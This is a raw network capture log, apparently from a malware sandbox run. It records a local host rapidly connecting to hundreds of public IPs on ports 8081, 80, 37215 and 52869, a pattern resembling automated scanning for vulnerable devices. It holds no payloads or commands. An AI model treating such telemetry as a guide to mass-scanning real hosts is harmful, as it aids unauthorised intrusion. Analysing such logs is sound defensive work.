                                                Jul 20, 2024 23:05:33.698947906 CEST267108081192.168.2.14203.226.166.55
                                                Jul 20, 2024 23:05:33.698947906 CEST267108081192.168.2.1434.86.242.117
                                                Jul 20, 2024 23:05:33.698947906 CEST267108081192.168.2.14170.234.254.127
                                                Jul 20, 2024 23:05:33.698947906 CEST267108081192.168.2.1496.213.194.10
                                                Jul 20, 2024 23:05:33.698947906 CEST267108081192.168.2.14172.4.165.141
                                                Jul 20, 2024 23:05:33.699187994 CEST267108081192.168.2.14209.212.246.106
                                                Jul 20, 2024 23:05:33.699187994 CEST267108081192.168.2.1492.242.25.177
                                                Jul 20, 2024 23:05:33.699187994 CEST267108081192.168.2.1463.226.83.22
                                                Jul 20, 2024 23:05:33.699187994 CEST267108081192.168.2.14106.6.170.49
                                                Jul 20, 2024 23:05:33.699187994 CEST267108081192.168.2.1495.69.236.166
                                                Jul 20, 2024 23:05:33.699187994 CEST267108081192.168.2.14142.96.30.162
                                                Jul 20, 2024 23:05:33.699187994 CEST267108081192.168.2.14203.180.114.81
                                                Jul 20, 2024 23:05:33.699187994 CEST267108081192.168.2.1454.133.33.240
                                                Jul 20, 2024 23:05:33.699240923 CEST80812671050.50.232.244192.168.2.14
                                                Jul 20, 2024 23:05:33.699245930 CEST80815793014.227.196.59192.168.2.14
                                                Jul 20, 2024 23:05:33.699250937 CEST808126710218.198.243.113192.168.2.14
                                                Jul 20, 2024 23:05:33.699255943 CEST80812671059.210.36.228192.168.2.14
                                                Jul 20, 2024 23:05:33.699266911 CEST808126710142.133.220.119192.168.2.14
                                                Jul 20, 2024 23:05:33.699270964 CEST808126710222.110.145.24192.168.2.14
                                                Jul 20, 2024 23:05:33.699275970 CEST808159106117.202.144.121192.168.2.14
                                                Jul 20, 2024 23:05:33.699280977 CEST808126710157.156.71.49192.168.2.14
                                                Jul 20, 2024 23:05:33.699285030 CEST808126710205.224.252.166192.168.2.14
                                                Jul 20, 2024 23:05:33.699290037 CEST808126710110.77.79.52192.168.2.14
                                                Jul 20, 2024 23:05:33.699299097 CEST80814463265.131.57.149192.168.2.14
                                                Jul 20, 2024 23:05:33.699302912 CEST808126710180.122.237.60192.168.2.14
                                                Jul 20, 2024 23:05:33.699307919 CEST808126710180.75.17.172192.168.2.14
                                                Jul 20, 2024 23:05:33.699311972 CEST80815445475.195.2.205192.168.2.14
                                                Jul 20, 2024 23:05:33.699316025 CEST808157276168.224.43.165192.168.2.14
                                                Jul 20, 2024 23:05:33.699320078 CEST808144074107.98.138.138192.168.2.14
                                                Jul 20, 2024 23:05:33.699323893 CEST808150482197.160.53.246192.168.2.14
                                                Jul 20, 2024 23:05:33.699327946 CEST80812671052.63.10.36192.168.2.14
                                                Jul 20, 2024 23:05:33.699331999 CEST80815072690.90.218.17192.168.2.14
                                                Jul 20, 2024 23:05:33.699336052 CEST808140138154.164.49.148192.168.2.14
                                                Jul 20, 2024 23:05:33.699340105 CEST808151180160.169.251.238192.168.2.14
                                                Jul 20, 2024 23:05:33.699345112 CEST80815114889.204.254.142192.168.2.14
                                                Jul 20, 2024 23:05:33.699467897 CEST808141350221.8.209.126192.168.2.14
                                                Jul 20, 2024 23:05:33.699472904 CEST808147062123.249.239.40192.168.2.14
                                                Jul 20, 2024 23:05:33.699477911 CEST80812671035.129.111.129192.168.2.14
                                                Jul 20, 2024 23:05:33.699481964 CEST80815154872.133.157.196192.168.2.14
                                                Jul 20, 2024 23:05:33.699491978 CEST808137874108.194.57.178192.168.2.14
                                                Jul 20, 2024 23:05:33.699502945 CEST80814095643.140.207.90192.168.2.14
                                                Jul 20, 2024 23:05:33.699507952 CEST808154280196.160.77.207192.168.2.14
                                                Jul 20, 2024 23:05:33.699512005 CEST80816071661.74.35.59192.168.2.14
                                                Jul 20, 2024 23:05:33.699522972 CEST80812671013.58.205.72192.168.2.14
                                                Jul 20, 2024 23:05:33.699527025 CEST80815674472.126.240.254192.168.2.14
                                                Jul 20, 2024 23:05:33.699628115 CEST808152030117.59.50.117192.168.2.14
                                                Jul 20, 2024 23:05:33.699632883 CEST808126710144.70.81.171192.168.2.14
                                                Jul 20, 2024 23:05:33.699636936 CEST808145674141.98.245.55192.168.2.14
                                                Jul 20, 2024 23:05:33.699640989 CEST808134792195.101.202.121192.168.2.14
                                                Jul 20, 2024 23:05:33.699650049 CEST80813726064.8.192.151192.168.2.14
                                                Jul 20, 2024 23:05:33.699655056 CEST80815328242.126.204.24192.168.2.14
                                                Jul 20, 2024 23:05:33.699659109 CEST80813560065.148.167.225192.168.2.14
                                                Jul 20, 2024 23:05:33.699662924 CEST80814001452.83.62.134192.168.2.14
                                                Jul 20, 2024 23:05:33.699666977 CEST80815796670.210.95.222192.168.2.14
                                                Jul 20, 2024 23:05:33.699676037 CEST808145336162.1.131.232192.168.2.14
                                                Jul 20, 2024 23:05:33.699680090 CEST808154266210.161.174.194192.168.2.14
                                                Jul 20, 2024 23:05:33.700069904 CEST267108081192.168.2.1482.45.53.166
                                                Jul 20, 2024 23:05:33.700071096 CEST267108081192.168.2.14139.177.45.56
                                                Jul 20, 2024 23:05:33.700071096 CEST267108081192.168.2.1494.125.5.224
                                                Jul 20, 2024 23:05:33.700071096 CEST267108081192.168.2.1437.231.142.39
                                                Jul 20, 2024 23:05:33.700071096 CEST267108081192.168.2.1477.188.4.50
                                                Jul 20, 2024 23:05:33.700071096 CEST267108081192.168.2.14138.243.227.89
                                                Jul 20, 2024 23:05:33.700071096 CEST267108081192.168.2.1493.95.23.233
                                                Jul 20, 2024 23:05:33.700071096 CEST267108081192.168.2.14140.136.228.204
                                                Jul 20, 2024 23:05:33.700139999 CEST80816004681.104.141.158192.168.2.14
                                                Jul 20, 2024 23:05:33.700145960 CEST808126710167.100.208.154192.168.2.14
                                                Jul 20, 2024 23:05:33.700150013 CEST80812671057.241.253.51192.168.2.14
                                                Jul 20, 2024 23:05:33.700155020 CEST80812671031.134.235.27192.168.2.14
                                                Jul 20, 2024 23:05:33.700165033 CEST80812671058.220.41.179192.168.2.14
                                                Jul 20, 2024 23:05:33.700169086 CEST808126710168.138.206.4192.168.2.14
                                                Jul 20, 2024 23:05:33.700174093 CEST808126710171.249.167.167192.168.2.14
                                                Jul 20, 2024 23:05:33.700177908 CEST80812671019.120.252.195192.168.2.14
                                                Jul 20, 2024 23:05:33.700233936 CEST572768081192.168.2.14168.224.43.165
                                                Jul 20, 2024 23:05:33.700233936 CEST401388081192.168.2.14154.164.49.148
                                                Jul 20, 2024 23:05:33.700233936 CEST504828081192.168.2.14197.160.53.246
                                                Jul 20, 2024 23:05:33.701004028 CEST544548081192.168.2.1475.195.2.205
                                                Jul 20, 2024 23:05:33.701004028 CEST507268081192.168.2.1490.90.218.17
                                                Jul 20, 2024 23:05:33.701004028 CEST511488081192.168.2.1489.204.254.142
                                                Jul 20, 2024 23:05:33.701102018 CEST267108081192.168.2.14161.135.88.141
                                                Jul 20, 2024 23:05:33.701102018 CEST267108081192.168.2.14220.66.66.150
                                                Jul 20, 2024 23:05:33.701102018 CEST267108081192.168.2.1474.136.155.79
                                                Jul 20, 2024 23:05:33.701102018 CEST267108081192.168.2.14201.204.119.74
                                                Jul 20, 2024 23:05:33.701102018 CEST267108081192.168.2.14190.19.12.161
                                                Jul 20, 2024 23:05:33.701102972 CEST267108081192.168.2.1459.218.120.253
                                                Jul 20, 2024 23:05:33.701765060 CEST267108081192.168.2.1466.196.140.70
                                                Jul 20, 2024 23:05:33.701765060 CEST267108081192.168.2.14213.51.104.126
                                                Jul 20, 2024 23:05:33.701765060 CEST267108081192.168.2.14137.191.44.206
                                                Jul 20, 2024 23:05:33.701765060 CEST267108081192.168.2.14141.97.206.49
                                                Jul 20, 2024 23:05:33.701765060 CEST267108081192.168.2.144.247.191.155
                                                Jul 20, 2024 23:05:33.701765060 CEST267108081192.168.2.1480.166.162.136
                                                Jul 20, 2024 23:05:33.701765060 CEST267108081192.168.2.14220.255.98.52
                                                Jul 20, 2024 23:05:33.701765060 CEST267108081192.168.2.1435.64.195.213
                                                Jul 20, 2024 23:05:33.701864958 CEST267108081192.168.2.14145.77.217.144
                                                Jul 20, 2024 23:05:33.701864958 CEST267108081192.168.2.14157.156.71.49
                                                Jul 20, 2024 23:05:33.701864958 CEST440748081192.168.2.14107.98.138.138
                                                Jul 20, 2024 23:05:33.701864958 CEST511808081192.168.2.14160.169.251.238
                                                Jul 20, 2024 23:05:33.701864958 CEST413508081192.168.2.14221.8.209.126
                                                Jul 20, 2024 23:05:33.701864958 CEST267108081192.168.2.1435.129.111.129
                                                Jul 20, 2024 23:05:33.701864958 CEST378748081192.168.2.14108.194.57.178
                                                Jul 20, 2024 23:05:33.701865911 CEST607168081192.168.2.1461.74.35.59
                                                Jul 20, 2024 23:05:33.702140093 CEST5454237215192.168.2.1441.103.45.78
                                                Jul 20, 2024 23:05:33.702140093 CEST267108081192.168.2.14142.57.242.144
                                                Jul 20, 2024 23:05:33.702140093 CEST267108081192.168.2.1414.35.198.9
                                                Jul 20, 2024 23:05:33.702140093 CEST267108081192.168.2.14197.141.202.147
                                                Jul 20, 2024 23:05:33.702140093 CEST267108081192.168.2.14181.206.174.231
                                                Jul 20, 2024 23:05:33.702908039 CEST267108081192.168.2.1486.35.5.8
                                                Jul 20, 2024 23:05:33.702908039 CEST267108081192.168.2.1417.7.135.117
                                                Jul 20, 2024 23:05:33.702908039 CEST267108081192.168.2.14139.69.41.174
                                                Jul 20, 2024 23:05:33.702908039 CEST267108081192.168.2.1461.62.63.33
                                                Jul 20, 2024 23:05:33.702908039 CEST267108081192.168.2.1462.209.103.244
                                                Jul 20, 2024 23:05:33.702908993 CEST267108081192.168.2.1431.186.130.138
                                                Jul 20, 2024 23:05:33.702908993 CEST267108081192.168.2.14222.110.145.24
                                                Jul 20, 2024 23:05:33.702908993 CEST579308081192.168.2.1414.227.196.59
                                                Jul 20, 2024 23:05:33.702965021 CEST267108081192.168.2.14161.152.1.223
                                                Jul 20, 2024 23:05:33.702965021 CEST267108081192.168.2.1445.120.136.159
                                                Jul 20, 2024 23:05:33.702965021 CEST348528081192.168.2.14125.204.49.213
                                                Jul 20, 2024 23:05:33.702965021 CEST568368081192.168.2.14154.14.145.41
                                                Jul 20, 2024 23:05:33.702965021 CEST434648081192.168.2.144.188.104.13
                                                Jul 20, 2024 23:05:33.702965021 CEST267108081192.168.2.14161.73.169.73
                                                Jul 20, 2024 23:05:33.702965021 CEST267108081192.168.2.1448.227.232.175
                                                Jul 20, 2024 23:05:33.702965975 CEST446328081192.168.2.1465.131.57.149
                                                Jul 20, 2024 23:05:33.703648090 CEST267108081192.168.2.1450.50.232.244
                                                Jul 20, 2024 23:05:33.703648090 CEST267108081192.168.2.1459.210.36.228
                                                Jul 20, 2024 23:05:33.703648090 CEST267108081192.168.2.14205.224.252.166
                                                Jul 20, 2024 23:05:33.703648090 CEST267108081192.168.2.14180.122.237.60
                                                Jul 20, 2024 23:05:33.703648090 CEST591068081192.168.2.14117.202.144.121
                                                Jul 20, 2024 23:05:33.703648090 CEST520308081192.168.2.14117.59.50.117
                                                Jul 20, 2024 23:05:33.703648090 CEST456748081192.168.2.14141.98.245.55
                                                Jul 20, 2024 23:05:33.703648090 CEST372608081192.168.2.1464.8.192.151
                                                Jul 20, 2024 23:05:33.704785109 CEST267108081192.168.2.14161.141.207.228
                                                Jul 20, 2024 23:05:33.704785109 CEST267108081192.168.2.1457.91.222.234
                                                Jul 20, 2024 23:05:33.704785109 CEST267108081192.168.2.14175.188.40.26
                                                Jul 20, 2024 23:05:33.704785109 CEST267108081192.168.2.14218.198.243.113
                                                Jul 20, 2024 23:05:33.704785109 CEST267108081192.168.2.14142.133.220.119
                                                Jul 20, 2024 23:05:33.704785109 CEST400148081192.168.2.1452.83.62.134
                                                Jul 20, 2024 23:05:33.704785109 CEST542668081192.168.2.14210.161.174.194
                                                Jul 20, 2024 23:05:33.704785109 CEST267108081192.168.2.14168.138.206.4
                                                Jul 20, 2024 23:05:33.704864979 CEST80814246464.11.70.189192.168.2.14
                                                Jul 20, 2024 23:05:33.704988956 CEST267108081192.168.2.14152.8.85.158
                                                Jul 20, 2024 23:05:33.704988956 CEST267108081192.168.2.14180.75.17.172
                                                Jul 20, 2024 23:05:33.704988956 CEST267108081192.168.2.14110.77.79.52
                                                Jul 20, 2024 23:05:33.704988956 CEST515488081192.168.2.1472.133.157.196
                                                Jul 20, 2024 23:05:33.704988956 CEST567448081192.168.2.1472.126.240.254
                                                Jul 20, 2024 23:05:33.704988956 CEST579668081192.168.2.1470.210.95.222
                                                Jul 20, 2024 23:05:33.704988956 CEST267108081192.168.2.1457.241.253.51
                                                Jul 20, 2024 23:05:33.704988956 CEST267108081192.168.2.1458.220.41.179
                                                Jul 20, 2024 23:05:33.705133915 CEST80813460235.119.194.71192.168.2.14
                                                Jul 20, 2024 23:05:33.705157995 CEST803567495.220.243.61192.168.2.14
                                                Jul 20, 2024 23:05:33.705488920 CEST267108081192.168.2.1452.63.10.36
                                                Jul 20, 2024 23:05:33.705488920 CEST347928081192.168.2.14195.101.202.121
                                                Jul 20, 2024 23:05:33.705488920 CEST356008081192.168.2.1465.148.167.225
                                                Jul 20, 2024 23:05:33.705488920 CEST267108081192.168.2.1431.134.235.27
                                                Jul 20, 2024 23:05:33.705488920 CEST3611680192.168.2.1495.234.250.137
                                                Jul 20, 2024 23:05:33.705488920 CEST3611680192.168.2.1495.234.250.137
                                                Jul 20, 2024 23:05:33.705738068 CEST470628081192.168.2.14123.249.239.40
                                                Jul 20, 2024 23:05:33.705738068 CEST542808081192.168.2.14196.160.77.207
                                                Jul 20, 2024 23:05:33.705738068 CEST3655080192.168.2.1495.234.250.137
                                                Jul 20, 2024 23:05:33.705738068 CEST5099852869192.168.2.1436.216.251.126
                                                Jul 20, 2024 23:05:33.706362963 CEST267108081192.168.2.1419.120.252.195
                                                Jul 20, 2024 23:05:33.706532955 CEST808126710171.92.6.207192.168.2.14
                                                Jul 20, 2024 23:05:33.706576109 CEST80812671034.238.5.153192.168.2.14
                                                Jul 20, 2024 23:05:33.706581116 CEST808126710148.48.174.119192.168.2.14
                                                Jul 20, 2024 23:05:33.706592083 CEST80812671017.125.229.27192.168.2.14
                                                Jul 20, 2024 23:05:33.706595898 CEST808126710221.1.146.66192.168.2.14
                                                Jul 20, 2024 23:05:33.706599951 CEST808126710162.187.202.50192.168.2.14
                                                Jul 20, 2024 23:05:33.706662893 CEST4706680192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:33.706662893 CEST4706680192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:33.706707954 CEST453368081192.168.2.14162.1.131.232
                                                Jul 20, 2024 23:05:33.706707954 CEST532828081192.168.2.1442.126.204.24
                                                Jul 20, 2024 23:05:33.706707954 CEST600468081192.168.2.1481.104.141.158
                                                Jul 20, 2024 23:05:33.706707954 CEST267108081192.168.2.14171.249.167.167
                                                Jul 20, 2024 23:05:33.706707954 CEST267108081192.168.2.1434.238.5.153
                                                Jul 20, 2024 23:05:33.706707954 CEST267108081192.168.2.14221.1.146.66
                                                Jul 20, 2024 23:05:33.706722975 CEST808126710122.224.81.48192.168.2.14
                                                Jul 20, 2024 23:05:33.706726074 CEST808126710178.14.231.191192.168.2.14
                                                Jul 20, 2024 23:05:33.706830025 CEST8081267101.119.53.99192.168.2.14
                                                Jul 20, 2024 23:05:33.706835032 CEST80812671066.10.46.36192.168.2.14
                                                Jul 20, 2024 23:05:33.706840038 CEST808126710168.36.124.34192.168.2.14
                                                Jul 20, 2024 23:05:33.706844091 CEST808126710149.38.171.227192.168.2.14
                                                Jul 20, 2024 23:05:33.706849098 CEST80812671099.85.68.217192.168.2.14
                                                Jul 20, 2024 23:05:33.706852913 CEST80812671070.28.47.6192.168.2.14
                                                Jul 20, 2024 23:05:33.706862926 CEST808126710176.110.112.204192.168.2.14
                                                Jul 20, 2024 23:05:33.706867933 CEST808126710153.216.192.244192.168.2.14
                                                Jul 20, 2024 23:05:33.706871986 CEST80812671086.105.209.88192.168.2.14
                                                Jul 20, 2024 23:05:33.706876040 CEST808126710170.27.182.205192.168.2.14
                                                Jul 20, 2024 23:05:33.706881046 CEST808126710164.14.33.227192.168.2.14
                                                Jul 20, 2024 23:05:33.706885099 CEST808126710105.53.14.84192.168.2.14
                                                Jul 20, 2024 23:05:33.706888914 CEST8081267108.68.90.77192.168.2.14
                                                Jul 20, 2024 23:05:33.706892967 CEST808126710120.181.17.173192.168.2.14
                                                Jul 20, 2024 23:05:33.706897974 CEST808126710145.21.237.27192.168.2.14
                                                Jul 20, 2024 23:05:33.706955910 CEST267108081192.168.2.14176.110.112.204
                                                Jul 20, 2024 23:05:33.706955910 CEST267108081192.168.2.1499.85.68.217
                                                Jul 20, 2024 23:05:33.707124949 CEST267108081192.168.2.14122.224.81.48
                                                Jul 20, 2024 23:05:33.707124949 CEST267108081192.168.2.14170.27.182.205
                                                Jul 20, 2024 23:05:33.707124949 CEST267108081192.168.2.14120.181.17.173
                                                Jul 20, 2024 23:05:33.707133055 CEST808126710107.125.117.2192.168.2.14
                                                Jul 20, 2024 23:05:33.707138062 CEST808126710179.99.63.167192.168.2.14
                                                Jul 20, 2024 23:05:33.707142115 CEST80812671054.133.4.233192.168.2.14
                                                Jul 20, 2024 23:05:33.707274914 CEST409568081192.168.2.1443.140.207.90
                                                Jul 20, 2024 23:05:33.707274914 CEST267108081192.168.2.1413.58.205.72
                                                Jul 20, 2024 23:05:33.707274914 CEST267108081192.168.2.14144.70.81.171
                                                Jul 20, 2024 23:05:33.707274914 CEST267108081192.168.2.14167.100.208.154
                                                Jul 20, 2024 23:05:33.707274914 CEST4268052869192.168.2.1419.45.76.169
                                                Jul 20, 2024 23:05:33.707274914 CEST4230637215192.168.2.14166.16.190.83
                                                Jul 20, 2024 23:05:33.707274914 CEST267108081192.168.2.14148.48.174.119
                                                Jul 20, 2024 23:05:33.707274914 CEST267108081192.168.2.14168.36.124.34
                                                Jul 20, 2024 23:05:33.707290888 CEST808126710181.211.206.43192.168.2.14
                                                Jul 20, 2024 23:05:33.707295895 CEST80812671063.218.151.239192.168.2.14
                                                Jul 20, 2024 23:05:33.707300901 CEST8081430904.188.104.13192.168.2.14
                                                Jul 20, 2024 23:05:33.707304955 CEST80812671053.5.139.93192.168.2.14
                                                Jul 20, 2024 23:05:33.707314968 CEST808126710208.163.212.92192.168.2.14
                                                Jul 20, 2024 23:05:33.707319021 CEST80812671035.205.199.38192.168.2.14
                                                Jul 20, 2024 23:05:33.707323074 CEST808126710171.144.192.136192.168.2.14
                                                Jul 20, 2024 23:05:33.707328081 CEST80812671031.17.213.30192.168.2.14
                                                Jul 20, 2024 23:05:33.707331896 CEST808126710177.157.142.250192.168.2.14
                                                Jul 20, 2024 23:05:33.707335949 CEST8081267104.210.204.138192.168.2.14
                                                Jul 20, 2024 23:05:33.707369089 CEST267108081192.168.2.14179.99.63.167
                                                Jul 20, 2024 23:05:33.707453966 CEST808126710189.28.214.100192.168.2.14
                                                Jul 20, 2024 23:05:33.707520962 CEST267108081192.168.2.14189.28.214.100
                                                Jul 20, 2024 23:05:33.707575083 CEST267108081192.168.2.14171.92.6.207
                                                Jul 20, 2024 23:05:33.707575083 CEST267108081192.168.2.141.119.53.99
                                                Jul 20, 2024 23:05:33.707575083 CEST267108081192.168.2.14153.216.192.244
                                                Jul 20, 2024 23:05:33.707575083 CEST267108081192.168.2.148.68.90.77
                                                Jul 20, 2024 23:05:33.707575083 CEST267108081192.168.2.14107.125.117.2
                                                Jul 20, 2024 23:05:33.707575083 CEST267108081192.168.2.14181.211.206.43
                                                Jul 20, 2024 23:05:33.707575083 CEST267108081192.168.2.14171.144.192.136
                                                Jul 20, 2024 23:05:33.707576036 CEST267108081192.168.2.14177.157.142.250
                                                Jul 20, 2024 23:05:33.707729101 CEST572788081192.168.2.1487.232.28.113
                                                Jul 20, 2024 23:05:33.707729101 CEST572788081192.168.2.1487.232.28.113
                                                Jul 20, 2024 23:05:33.707729101 CEST576528081192.168.2.1487.232.28.113
                                                Jul 20, 2024 23:05:33.707729101 CEST267108081192.168.2.1417.125.229.27
                                                Jul 20, 2024 23:05:33.707729101 CEST267108081192.168.2.14162.187.202.50
                                                Jul 20, 2024 23:05:33.707729101 CEST267108081192.168.2.14178.14.231.191
                                                Jul 20, 2024 23:05:33.707897902 CEST808126710155.239.120.163192.168.2.14
                                                Jul 20, 2024 23:05:33.707902908 CEST808126710159.87.4.35192.168.2.14
                                                Jul 20, 2024 23:05:33.707906961 CEST808126710163.124.6.187192.168.2.14
                                                Jul 20, 2024 23:05:33.707972050 CEST5344437215192.168.2.14131.78.104.9
                                                Jul 20, 2024 23:05:33.708039999 CEST80812671045.251.156.1192.168.2.14
                                                Jul 20, 2024 23:05:33.708045006 CEST808126710153.233.167.191192.168.2.14
                                                Jul 20, 2024 23:05:33.708050013 CEST808126710161.135.88.141192.168.2.14
                                                Jul 20, 2024 23:05:33.708054066 CEST80812671089.142.251.41192.168.2.14
                                                Jul 20, 2024 23:05:33.708161116 CEST267108081192.168.2.14153.233.167.191
                                                Jul 20, 2024 23:05:33.708471060 CEST80812671097.130.38.217192.168.2.14
                                                Jul 20, 2024 23:05:33.708477020 CEST80812671066.196.140.70192.168.2.14
                                                Jul 20, 2024 23:05:33.708479881 CEST808126710220.66.66.150192.168.2.14
                                                Jul 20, 2024 23:05:33.708611965 CEST80812671087.229.23.172192.168.2.14
                                                Jul 20, 2024 23:05:33.708616972 CEST808126710213.51.104.126192.168.2.14
                                                Jul 20, 2024 23:05:33.708621025 CEST80812671074.136.155.79192.168.2.14
                                                Jul 20, 2024 23:05:33.708625078 CEST808126710137.191.44.206192.168.2.14
                                                Jul 20, 2024 23:05:33.708635092 CEST80812671061.109.89.9192.168.2.14
                                                Jul 20, 2024 23:05:33.708640099 CEST808126710141.97.206.49192.168.2.14
                                                Jul 20, 2024 23:05:33.708642960 CEST8081267104.247.191.155192.168.2.14
                                                Jul 20, 2024 23:05:33.708647966 CEST80812671080.166.162.136192.168.2.14
                                                Jul 20, 2024 23:05:33.708653927 CEST267108081192.168.2.1466.10.46.36
                                                Jul 20, 2024 23:05:33.708653927 CEST267108081192.168.2.14149.38.171.227
                                                Jul 20, 2024 23:05:33.708653927 CEST267108081192.168.2.1463.218.151.239
                                                Jul 20, 2024 23:05:33.708653927 CEST267108081192.168.2.14208.163.212.92
                                                Jul 20, 2024 23:05:33.708653927 CEST267108081192.168.2.144.210.204.138
                                                Jul 20, 2024 23:05:33.708653927 CEST267108081192.168.2.14159.87.4.35
                                                Jul 20, 2024 23:05:33.708653927 CEST267108081192.168.2.14163.124.6.187
                                                Jul 20, 2024 23:05:33.708653927 CEST267108081192.168.2.14161.135.88.141
                                                Jul 20, 2024 23:05:33.708657026 CEST808126710220.255.98.52192.168.2.14
                                                Jul 20, 2024 23:05:33.708662033 CEST80812671035.64.195.213192.168.2.14
                                                Jul 20, 2024 23:05:33.708666086 CEST372155454241.103.45.78192.168.2.14
                                                Jul 20, 2024 23:05:33.708669901 CEST80813481080.161.237.245192.168.2.14
                                                Jul 20, 2024 23:05:33.708673954 CEST808126710201.204.119.74192.168.2.14
                                                Jul 20, 2024 23:05:33.708678007 CEST808151250137.216.162.82192.168.2.14
                                                Jul 20, 2024 23:05:33.708681107 CEST80815297099.244.224.1192.168.2.14
                                                Jul 20, 2024 23:05:33.708686113 CEST808126710161.152.1.223192.168.2.14
                                                Jul 20, 2024 23:05:33.708689928 CEST808138876139.94.219.97192.168.2.14
                                                Jul 20, 2024 23:05:33.708693981 CEST80812671045.120.136.159192.168.2.14
                                                Jul 20, 2024 23:05:33.708697081 CEST808151862114.235.217.176192.168.2.14
                                                Jul 20, 2024 23:05:33.708702087 CEST80813497635.119.194.71192.168.2.14
                                                Jul 20, 2024 23:05:33.708705902 CEST80814246464.11.70.189192.168.2.14
                                                Jul 20, 2024 23:05:33.708714962 CEST267108081192.168.2.1497.130.38.217
                                                Jul 20, 2024 23:05:33.708714962 CEST267108081192.168.2.1466.196.140.70
                                                Jul 20, 2024 23:05:33.708717108 CEST267108081192.168.2.14213.51.104.126
                                                Jul 20, 2024 23:05:33.708717108 CEST267108081192.168.2.14137.191.44.206
                                                Jul 20, 2024 23:05:33.708717108 CEST267108081192.168.2.14141.97.206.49
                                                Jul 20, 2024 23:05:33.708717108 CEST267108081192.168.2.14220.255.98.52
                                                Jul 20, 2024 23:05:33.708717108 CEST267108081192.168.2.1435.64.195.213
                                                Jul 20, 2024 23:05:33.708717108 CEST267108081192.168.2.144.247.191.155
                                                Jul 20, 2024 23:05:33.709002018 CEST804535895.187.58.238192.168.2.14
                                                Jul 20, 2024 23:05:33.709117889 CEST267108081192.168.2.1453.5.139.93
                                                Jul 20, 2024 23:05:33.709117889 CEST267108081192.168.2.1435.205.199.38
                                                Jul 20, 2024 23:05:33.709117889 CEST267108081192.168.2.1431.17.213.30
                                                Jul 20, 2024 23:05:33.709119081 CEST267108081192.168.2.1489.142.251.41
                                                Jul 20, 2024 23:05:33.709119081 CEST267108081192.168.2.1487.229.23.172
                                                Jul 20, 2024 23:05:33.709119081 CEST388768081192.168.2.14139.94.219.97
                                                Jul 20, 2024 23:05:33.709119081 CEST512508081192.168.2.14137.216.162.82
                                                Jul 20, 2024 23:05:33.709119081 CEST4535880192.168.2.1495.187.58.238
                                                Jul 20, 2024 23:05:33.709176064 CEST267108081192.168.2.14105.53.14.84
                                                Jul 20, 2024 23:05:33.709176064 CEST267108081192.168.2.1486.105.209.88
                                                Jul 20, 2024 23:05:33.709176064 CEST267108081192.168.2.14145.21.237.27
                                                Jul 20, 2024 23:05:33.709176064 CEST267108081192.168.2.1454.133.4.233
                                                Jul 20, 2024 23:05:33.709736109 CEST267108081192.168.2.14155.239.120.163
                                                Jul 20, 2024 23:05:33.709736109 CEST267108081192.168.2.1445.251.156.1
                                                Jul 20, 2024 23:05:33.709736109 CEST267108081192.168.2.1461.109.89.9
                                                Jul 20, 2024 23:05:33.710371017 CEST267108081192.168.2.1470.28.47.6
                                                Jul 20, 2024 23:05:33.710371017 CEST267108081192.168.2.14164.14.33.227
                                                Jul 20, 2024 23:05:33.710551023 CEST267108081192.168.2.1480.166.162.136
                                                Jul 20, 2024 23:05:33.710551023 CEST267108081192.168.2.14161.152.1.223
                                                Jul 20, 2024 23:05:33.710551023 CEST267108081192.168.2.1445.120.136.159
                                                Jul 20, 2024 23:05:33.710551023 CEST518628081192.168.2.14114.235.217.176
                                                Jul 20, 2024 23:05:33.710551023 CEST349768081192.168.2.1435.119.194.71
                                                Jul 20, 2024 23:05:33.710551023 CEST424648081192.168.2.1464.11.70.189
                                                Jul 20, 2024 23:05:33.710820913 CEST5454237215192.168.2.1441.103.45.78
                                                Jul 20, 2024 23:05:33.710820913 CEST529708081192.168.2.1499.244.224.1
                                                Jul 20, 2024 23:05:33.711435080 CEST267108081192.168.2.14220.66.66.150
                                                Jul 20, 2024 23:05:33.711435080 CEST267108081192.168.2.1474.136.155.79
                                                Jul 20, 2024 23:05:33.711436033 CEST348108081192.168.2.1480.161.237.245
                                                Jul 20, 2024 23:05:33.711436033 CEST267108081192.168.2.14201.204.119.74
                                                Jul 20, 2024 23:05:33.711782932 CEST4750080192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:33.711944103 CEST8081434644.188.104.13192.168.2.14
                                                Jul 20, 2024 23:05:33.712107897 CEST434648081192.168.2.144.188.104.13
                                                Jul 20, 2024 23:05:33.712421894 CEST4319452869192.168.2.14142.219.250.29
                                                Jul 20, 2024 23:05:33.712616920 CEST344068081192.168.2.14206.200.85.218
                                                Jul 20, 2024 23:05:33.713267088 CEST803611695.234.250.137192.168.2.14
                                                Jul 20, 2024 23:05:33.713283062 CEST804706695.191.67.246192.168.2.14
                                                Jul 20, 2024 23:05:33.713291883 CEST803655095.234.250.137192.168.2.14
                                                Jul 20, 2024 23:05:33.713315010 CEST80814209064.11.70.189192.168.2.14
                                                Jul 20, 2024 23:05:33.713326931 CEST803769495.246.233.118192.168.2.14
                                                Jul 20, 2024 23:05:33.713330984 CEST80815035290.90.218.17192.168.2.14
                                                Jul 20, 2024 23:05:33.713382959 CEST806025095.211.239.130192.168.2.14
                                                Jul 20, 2024 23:05:33.713406086 CEST3655080192.168.2.1495.234.250.137
                                                Jul 20, 2024 23:05:33.713423014 CEST528695099836.216.251.126192.168.2.14
                                                Jul 20, 2024 23:05:33.713592052 CEST5099852869192.168.2.1436.216.251.126
                                                Jul 20, 2024 23:05:33.713816881 CEST80815727887.232.28.113192.168.2.14
                                                Jul 20, 2024 23:05:33.713834047 CEST80815765287.232.28.113192.168.2.14
                                                Jul 20, 2024 23:05:33.713848114 CEST3721553444131.78.104.9192.168.2.14
                                                Jul 20, 2024 23:05:33.713893890 CEST5344437215192.168.2.14131.78.104.9
                                                Jul 20, 2024 23:05:33.714040995 CEST576528081192.168.2.1487.232.28.113
                                                Jul 20, 2024 23:05:33.714426041 CEST528694268019.45.76.169192.168.2.14
                                                Jul 20, 2024 23:05:33.714508057 CEST4268052869192.168.2.1419.45.76.169
                                                Jul 20, 2024 23:05:33.714606047 CEST3721542306166.16.190.83192.168.2.14
                                                Jul 20, 2024 23:05:33.714658976 CEST4230637215192.168.2.14166.16.190.83
                                                Jul 20, 2024 23:05:33.714838982 CEST5888880192.168.2.1495.164.165.175
                                                Jul 20, 2024 23:05:33.714838982 CEST5888880192.168.2.1495.164.165.175
                                                Jul 20, 2024 23:05:33.715648890 CEST3848037215192.168.2.14197.148.145.109
                                                Jul 20, 2024 23:05:33.716981888 CEST5932480192.168.2.1495.164.165.175
